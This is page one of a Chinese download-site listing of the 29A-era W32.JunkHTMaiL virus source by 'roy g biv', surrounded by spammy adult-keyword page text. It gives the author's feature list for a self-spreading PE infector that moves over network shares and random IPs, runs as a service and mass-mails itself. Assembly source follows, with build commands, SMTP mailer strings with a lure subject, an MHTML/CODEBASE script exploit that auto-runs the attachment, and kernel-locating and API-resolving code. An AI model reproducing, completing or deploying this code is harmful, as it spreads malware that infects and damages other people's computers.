亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關(guān)于我們
? 蟲蟲下載站

?? 29a-7.004

?? 從29A上收集的病毒源碼
?? 004
?? 第 1 頁 / 共 5 頁
字號:

comment ;)
W32.JunkHTMaiL by roy g biv (thanks to RT Fishel for previous contribution)

some of its features:
- parasitic resident (own process) infector of PE exe (but not looking at suffix)
- infects files in all directories on all fixed and network drives and network shares
- directory traversal is linked-list instead of recursive to reduce stack size
- enumerates shares on local network and also random IP addresses
- reloc section inserter/last section appender
- runs as service in NT/2000/XP and service process in 9x/Me
- hooks all executable shell\open\command values
- slow mailer using polymorphic mail headers and self-executing HTML
- auto function type selection (Unicode under NT/2000/XP, ANSI under 9x/Me)
- uses CRCs instead of API names
- uses SEH for common code exit
- section attributes are never altered (virus is self-modifying but runs in writable memory)
- no infect files with data outside of image (eg self-extractors)
- infected files are padded by random amounts to confuse tail scanners
- uses SEH walker to find kernel address (no hard-coded addresses)
- correct file checksum without using imagehlp.dll :) 100% correct algorithm
- plus some new code optimisations that were never seen before W32.EfishNC :)

yes, just a W32.JunkMail remake with a different exploit
---

  optimisation tip: Windows appends ".dll" automatically, so this works:
        push "cfs"
        push esp
        call LoadLibraryA
---

to build this thing:
tasm
----
tasm32 /ml /m3 junkhtml
tlink32 /B:400000 /x junkhtml,,,import32

Virus is not self-modifying, so no need to alter section attributes
---

We're in the middle of a phase transition:
a butterfly flapping its wings at
just the right moment could
cause a storm to happen.
-I'm trying to understand-
I'm at a moment in my life-
I don't know where to flap my wings.
(Danny Hillis)

(;

.486
.model  flat

extern  GlobalAlloc:proc
extern  CreateFileA:proc
extern  GetFileSize:proc
extern  GetModuleFileNameA:proc
extern  ReadFile:proc
extern  WriteFile:proc
extern  CloseHandle:proc
extern  GlobalFree:proc
extern  GetCurrentProcess:proc
extern  WriteProcessMemory:proc
extern  MessageBoxA:proc
extern  ExitProcess:proc

.data

;to alter the text here, set compress_only to not-zero then run
;in that case, the compressed text is written to a file only

compress_only   equ     0

ife compress_only

;must be reverse alphabetical order because they are stored on stack
;API names are not present in replications, only in dropper

expnames        db      "WriteFile"           , 0
                db      "WinExec"             , 0
                db      "SetFileAttributesA"  , 0
                db      "MoveFileA"           , 0
                db      "LoadLibraryA"        , 0
                db      "GlobalFree"          , 0
                db      "GlobalAlloc"         , 0
                db      "GetWindowsDirectoryA", 0
                db      "GetTickCount"        , 0
                db      "GetTempFileNameA"    , 0
                db      "GetFileAttributesA"  , 0
                db      "GetCurrentProcess"   , 0
                db      "DeleteFileA"         , 0
                db      "CreateFileA"         , 0
                db      "CloseHandle"         , 0

regnames        db      "RegSetValueA"      , 0
                db      "OpenSCManagerA"    , 0
                db      "CreateServiceA"    , 0
                db      "CloseServiceHandle", 0

exenames        db      "LoadLibraryA"   , 0
                db      "GlobalAlloc"    , 0
                db      "GetVersion"     , 0
                db      "GetTickCount"   , 0
                db      "GetStartupInfoW", 0
                db      "GetStartupInfoA", 0
                db      "GetCommandLineW", 0
                db      "GetCommandLineA", 0
                db      "ExitProcess"    , 0
                db      "CreateProcessW" , 0
                db      "CreateProcessA" , 0

usrnames        db      "CharNextW", 0
                db      "CharNextA", 0

svcnames        db      "StartServiceCtrlDispatcherA", 0

krnnames        db      "lstrlenW"                 , 0
                db      "lstrcpyW"                 , 0
                db      "lstrcatW"                 , 0
                db      "UnmapViewOfFile"          , 0
                db      "Sleep"                    , 0
                db      "SetFileTime"              , 0
                db      "SetFileAttributesW"       , 0
                db      "SetFileAttributesA"       , 0
                db      "SetCurrentDirectoryW"     , 0
                db      "SetCurrentDirectoryA"     , 0
                db      "ReadFile"                 , 0
                db      "MultiByteToWideChar"      , 0
                db      "MapViewOfFile"            , 0
                db      "LoadLibraryA"             , 0
                db      "GlobalFree"               , 0
                db      "GlobalAlloc"              , 0
                db      "GetVersion"               , 0
                db      "GetTickCount"             , 0
                db      "GetModuleFileNameA"       , 0
                db      "GetFullPathNameW"         , 0
                db      "GetFullPathNameA"         , 0
                db      "GetFileSize"              , 0
                db      "GetDriveTypeA"            , 0
                db      "FindNextFileW"            , 0
                db      "FindNextFileA"            , 0
                db      "FindFirstFileW"           , 0
                db      "FindFirstFileA"           , 0
                db      "FindClose"                , 0
                db      "CreateThread"             , 0
                db      "CreateFileW"              , 0
                db      "CreateFileMappingA"       , 0
                db      "CreateFileA"              , 0
                db      "CloseHandle"              , 0

sfcnames        db      "SfcIsFileProtected", 0

ws2names        db      "socket"       , 0
                db      "send"         , 0
                db      "gethostbyname", 0
                db      "connect"      , 0
                db      "WSAStartup"   , 0

netnames        db      "WNetOpenEnumW"    , 0
                db      "WNetOpenEnumA"    , 0
                db      "WNetEnumResourceW", 0
                db      "WNetEnumResourceA", 0
                db      "WNetCloseEnum"    , 0

ip9xnames       db      "NetShareEnum", 0

ipntnames       db      "NetShareEnum"    , 0
                db      "NetApiBufferFree", 0

endif

;only 0dh is required for new line, since 0ah is appended by decompressor

user1           equ     ' '
user2           equ     '/'
user3           equ     ':'                     ;the three most frequent characters

smtp1           db      offset smtp2 - offset $ - 2, "HELO ", 0
smtp2           db      offset smtp3 - offset $ - 2, "MAIL FROM:<>", 0dh, 0
smtp3           db      offset smtp4 - offset $ - 2, "RCPT TO:", 0
smtp4           db      offset header1 - offset $ - 2, "DATA", 0dh, 0
header1         db      offset header2 - offset $ - 2, "FROM: ", 0
header2         db      offset header31 - offset $ - 2, "SUBJECT: Wanna see a e-mail exploit?", 0
header31        db      offset header32 - offset $ - 2, 0dh, "MIME-VERSION:", 0
header32        db      offset part11 - offset $ - 2, "1.0", 0
part11          db      offset part12 - offset $ - 2, "CONTENT-TYPE:", 0
part12          db      offset part13 - offset $ - 2, "MULTIPART/MIXED;", 0
part13          db      offset body1 - offset $ - 2, " BOUNDARY=", 0

body1           db      offset body2 - offset $ - 1
                db      0dh, "Just click the attachment", 0dh
body2           db      offset body3 - offset $ - 1
                db      "If the attachment is blocked by Outlook 2002 then see", 0dh
body3           db      offset body4 - offset $ - 1
                db      "http://support.microsoft.com/support/kb/articles/q290/4/97.asp", 0dh
body4           db      0

part21          db      offset part22 - offset $ - 2, "TEXT/PLAIN;", 0
part22          db      offset part23 - offset $ - 2, " NAME=EMAIL.HTM", 0
part23          db      offset part24 - offset $ - 2, 0dh, "CONTENT-TRANSFER-ENCODING:", 0
part24          db      offset part25 - offset $ - 2, "QUOTED-PRINTABLE", 0
part25          db      offset part26 - offset $ - 2, 0dh, "CONTENT-DISPOSITION:", 0
part26          db      offset part27 - offset $ - 2, "ATTACHMENT", 0
part27          db      offset part28 - offset $ - 2, "CONTENT-LOCATION:FILE:///.EXE", 0
part28          db      offset part31 - offset $ - 2, "BASE64", 0

;just a bit too long for a single line... unless you remove the "moveBy"...

part31          db      offset part32 - offset $ - 1, 0dh, "<SCRIPT>moveBy(9999);with(document)write(", 22h, "<OBJECT CLASSID='CLSID:1BADDEED'"
part32          db      offset part41 - offset $ - 2, "CODEBASE='MHTML:", 22h, "+URL+", 22h, "!FILE:///.EXE'></OBJECT>", 22h, ")</SCRIPT>", 0

part41          db      offset part42 - offset $ - 2, ".", 0dh, 0
part42          db      offset part43 - offset $ - 2, "QUIT", 0dh, 0
part43          equ     $

include junkhtml.inc

txttitle        db      "JunkHTMaiL", 0

if  compress_only
txtbody         db      "compress done", 0
else
txtbody         db      "running...", 0

patch_host      label   near
        pop     ecx
        push    ecx
        call    $ + 5
        pop     eax
        add     eax, offset host_patch - offset $ + 6
        sub     ecx, eax
        push    ecx
        mov     eax, esp
        xor     edi, edi
        push    edi
        push    4
        push    eax
        push    offset host_patch + 1
        push    esi
        call    WriteProcessMemory
        jmp     junkhtml_inf

;-----------------------------------------------------------------------------
;everything before this point is dropper code
;-----------------------------------------------------------------------------

;-----------------------------------------------------------------------------
;virus code begins here in infected files
;-----------------------------------------------------------------------------

junkhtml_inf    proc    near
        pushad
        call    walk_seh

;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------

expcrcbegin     label   near                    ;place < 80h bytes from call for smaller code
        dd      (expcrc_count + 1) dup (0)
expcrcend       label   near
        dd      offset drop_exp - offset expcrcend + 4
        db      "JunkHTMaiL - roy g biv"        ;spam just got harder to remove ;)

walk_seh        label   near
        xor     esi, esi
        lods    dword ptr fs:[esi]
        inc     eax

seh_loop        label   near
        dec     eax
        xchg    esi, eax
        lods    dword ptr [esi]
        inc     eax
        jne     seh_loop
        lods    dword ptr [esi]

;-----------------------------------------------------------------------------
;moved label after some data because "e800000000" looks like virus code ;)
;-----------------------------------------------------------------------------

init_findmz     label   near
        inc     eax
        xchg    edi, eax

find_mzhdr      label   near

;-----------------------------------------------------------------------------
;do not use hard-coded kernel address values because it is not portable
;Microsoft used all different values for 95, 98, NT, 2000, Me, XP
;they will maybe change again for every new release
;-----------------------------------------------------------------------------

        dec     edi                             ;sub 64kb
        xor     di, di                          ;64kb align
        call    is_pehdr
        jne     find_mzhdr
        mov     ebx, edi
        pop     edi

;-----------------------------------------------------------------------------
;parse export table
;-----------------------------------------------------------------------------

        mov     esi, dword ptr [esi + pehdr.peexport.dirrva - pehdr.pecoff]
        lea     esi, dword ptr [ebx + esi + peexp.expordbase]
        lods    dword ptr [esi]                 ;Ordinal Base
        lea     ebp, dword ptr [eax * 2 + ebx]
        lods    dword ptr [esi]
        lods    dword ptr [esi]
        lods    dword ptr [esi]                 ;Export Address Table RVA
        lea     edx, dword ptr [ebx + eax]
        lods    dword ptr [esi]                 ;Name Pointer Table RVA
        add     ebp, dword ptr [esi]            ;Ordinal Table RVA
        lea     ecx, dword ptr [ebx + eax]
        mov     esi, ecx

push_export     label   near
        push    ecx

get_export      label   near
        lods    dword ptr [esi]
        push    ebx
        add     ebx, eax                        ;Name Pointer VA
        or      eax, -1

crc_outer       label   near
        xor     al, byte ptr [ebx]
        push    8
        pop     ecx

crc_inner       label   near
        add     eax, eax
        jnb     crc_skip
        xor     eax, 4c11db7h                   ;use generator polymonial (see IEEE 802)

?? 快捷鍵說明

復(fù)制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
国产精品久久久久久久久免费桃花| 7878成人国产在线观看| 美国毛片一区二区| 天堂精品中文字幕在线| 亚洲图片自拍偷拍| 天天av天天翘天天综合网 | 99久精品国产| 91香蕉视频在线| 91性感美女视频| 色婷婷激情综合| 欧美亚洲国产一区在线观看网站 | 亚洲国产精品天堂| 亚洲午夜私人影院| 日韩va亚洲va欧美va久久| 日本麻豆一区二区三区视频| 久久av中文字幕片| 国产大片一区二区| www.欧美.com| 欧美日韩一级黄| 日韩视频一区二区| 日本一二三不卡| 亚洲精品免费在线播放| 午夜精品免费在线| 九色综合狠狠综合久久| 波多野洁衣一区| 91福利区一区二区三区| 欧美一级在线免费| 日本一区二区三区国色天香| 亚洲激情av在线| 精品一区二区三区免费播放| 国产99精品视频| 91国产福利在线| 日韩欧美另类在线| 亚洲乱码国产乱码精品精小说 | 欧美一级日韩不卡播放免费| 精品国内片67194| 亚洲欧美激情在线| 精品一区二区三区在线观看| 成人午夜视频免费看| 欧美精品亚洲一区二区在线播放| 欧美www视频| 亚洲精品免费一二三区| 韩国av一区二区三区在线观看| 91视频在线看| 精品国产一二三区| 一区二区三区四区在线播放| 国内精品自线一区二区三区视频| 91丨九色丨尤物| 精品国产露脸精彩对白| 亚洲自拍偷拍网站| 福利一区福利二区| 日韩免费电影一区| 五月天激情综合| 99国产欧美久久久精品| 久久久久久久久岛国免费| 亚洲一区二区三区中文字幕在线 | 国产精品拍天天在线| 免费精品99久久国产综合精品| 99精品视频一区二区三区| 久久久综合精品| 免费成人性网站| 欧美挠脚心视频网站| 樱花草国产18久久久久| 国产成人啪午夜精品网站男同| 欧美一级二级在线观看| 香蕉加勒比综合久久| 色哦色哦哦色天天综合| 亚洲欧洲性图库| 99精品国产视频| 国产精品乱码一区二区三区软件 | 国产一区二区久久| 日韩美女一区二区三区四区| 午夜国产精品影院在线观看| 色综合久久中文综合久久97| 自拍偷拍亚洲激情| 99久久免费视频.com| 国产精品久久精品日日| 不卡视频一二三| 中文字幕一区二区三| 色婷婷久久一区二区三区麻豆| 国产精品私人自拍| av电影在线观看完整版一区二区| 国产精品热久久久久夜色精品三区| 国产91精品精华液一区二区三区 | 国产精品三级视频| 99热精品国产| 一个色综合av| 欧美日韩久久久一区| 日韩电影一区二区三区| 欧美成人艳星乳罩| 盗摄精品av一区二区三区| 国产精品美女久久久久久久久 | 欧美日韩国产高清一区| 蜜乳av一区二区| 久久久无码精品亚洲日韩按摩| 粉嫩aⅴ一区二区三区四区| 日本一区二区三区在线观看| 色94色欧美sute亚洲线路一ni | 欧美xxx久久| 粉嫩av一区二区三区| 一区二区三区在线视频观看58| 欧美日韩精品免费观看视频| 青青草国产精品97视觉盛宴| 国产欧美精品一区二区色综合| 99国产精品久久久久久久久久 | 久久综合九色综合欧美98| 岛国av在线一区| 亚洲午夜影视影院在线观看| 精品国产一区二区三区四区四 | 欧美日韩精品一区二区三区蜜桃 | 欧美亚洲禁片免费| 久久99深爱久久99精品| 国产精品久久国产精麻豆99网站| 欧美日韩国产中文| 成人午夜免费电影| 日韩国产欧美视频| 综合亚洲深深色噜噜狠狠网站| 91麻豆精品国产91久久久久久久久| 国产原创一区二区三区| 一卡二卡欧美日韩| 久久综合成人精品亚洲另类欧美 | 成人午夜电影小说| 天天影视色香欲综合网老头| 中文字幕欧美激情| 欧美一区二区三区在线观看| 91麻豆精品秘密| 国产一区二区按摩在线观看| 亚洲成a人片综合在线| 国产婷婷精品av在线| 欧美一级免费大片| 91黄色在线观看| 成人国产视频在线观看| 久久精品国产成人一区二区三区| 国产精品免费视频网站| 久久久久久久久蜜桃| 日韩欧美综合在线| 在线免费观看日本欧美| 99国产精品国产精品久久| 国产精品888| 美腿丝袜在线亚洲一区| 亚洲国产精品影院| 亚洲美女视频一区| 国产精品久久久久一区二区三区| www国产精品av| 精品国产sm最大网站免费看| 日韩亚洲欧美高清| 91精品国产高清一区二区三区 | 久久亚洲一级片| 日韩欧美一区中文| 欧美一区午夜视频在线观看| 欧美精品欧美精品系列| 欧美日韩一二区| 欧美久久久一区| 日韩一区二区免费在线观看| 日韩午夜av电影| 精品久久五月天| 久久婷婷成人综合色| 久久人人超碰精品| 国产精品乱人伦| 国产精品美女一区二区三区 | 欧美视频第二页| 欧美午夜精品一区二区蜜桃 | 久久99久久精品| 另类综合日韩欧美亚洲| 久久精品99国产国产精| 国产一区欧美日韩| 国产成人精品免费看| 成人免费av在线| 色哟哟一区二区在线观看 | 欧美日韩成人激情| 日韩午夜在线影院| 欧美va亚洲va国产综合| 欧美激情在线看| 日韩一区在线看| 亚洲国产另类精品专区| 蜜桃视频一区二区三区在线观看| 国产专区欧美精品| 波多野结衣一区二区三区 | 久久精品亚洲麻豆av一区二区 | 综合色天天鬼久久鬼色| 亚洲成人一区二区在线观看| 91免费国产在线| 欧美视频在线一区| 久久综合久久综合久久综合| 亚洲欧美国产77777| 麻豆一区二区三| 成人av在线影院| 51久久夜色精品国产麻豆| 久久精品水蜜桃av综合天堂| 综合久久给合久久狠狠狠97色| 日本欧美在线看| 99精品视频在线播放观看| 337p亚洲精品色噜噜| 一区在线播放视频| 久久99精品国产麻豆不卡| 91免费看`日韩一区二区| 精品日韩在线一区| 一区二区三区在线免费视频 | 中文字幕精品一区二区精品绿巨人 | 欧美视频在线播放|